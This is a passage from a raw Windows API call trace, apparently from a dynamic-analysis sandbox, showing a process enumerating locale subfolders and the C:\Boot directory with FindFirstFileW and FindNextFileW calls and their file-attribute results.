hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0156.204] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0156.204] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0156.265] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0156.265] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0156.265] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0156.265] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0156.265] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0156.266] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0156.266] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0156.266] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0156.266] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0156.267] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0156.267] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0156.310] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0156.310] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0156.310] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0156.310] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2960, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0156.310] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0156.311] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0156.311] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0156.311] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0156.311] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0156.311] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0156.312] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0156.312] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0156.312] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0156.312] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0156.313] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0156.313] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0156.313] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0156.313] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0156.313] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0156.314] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0156.314] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a8f7b9, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0156.315] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0156.315] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0156.315] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0156.315] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.315] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.316] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.316] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xf555b9a2, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0xf555b9a2, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0156.316] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0156.316] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0156.317] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0156.317] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0156.317] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0156.317] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0156.317] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, 